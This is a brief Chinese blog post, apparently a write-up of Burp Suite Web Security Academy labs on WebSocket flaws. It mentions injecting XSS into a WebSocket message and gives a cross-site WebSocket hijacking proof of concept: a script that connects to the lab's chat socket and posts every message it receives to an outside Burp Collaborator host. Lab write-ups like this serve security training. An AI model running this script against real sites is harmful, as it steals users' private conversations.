burp靶场-WebSocket漏洞

burp靶场WebSocket漏洞

1.操纵 WebSocket 消息以利用漏洞

image-20230817172726435

发送信息抓包,获取WebSocket链接,插入xss代码进行发送完成实验

2.

poc

1
2
3
4
5
6
7
8
9
<script>
    var ws = new WebSocket('wss://0a1c003703c889ba8172b6ea000f006d.web-security-academy.net/chat');
    ws.onopen = function() {
        ws.send("READY");
    };
    ws.onmessage = function(event) {
        fetch('https://g1iy6yqz871j2i3c0vze2cg83z9pxe.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>
网络安全BURP
#burpsuite靶场 #WebSocket
burp靶场-WebSocket漏洞
http://example.com/2023/08/17/burp靶场-WebSocket漏洞/
作者
QY
发布于
2023年8月17日
许可协议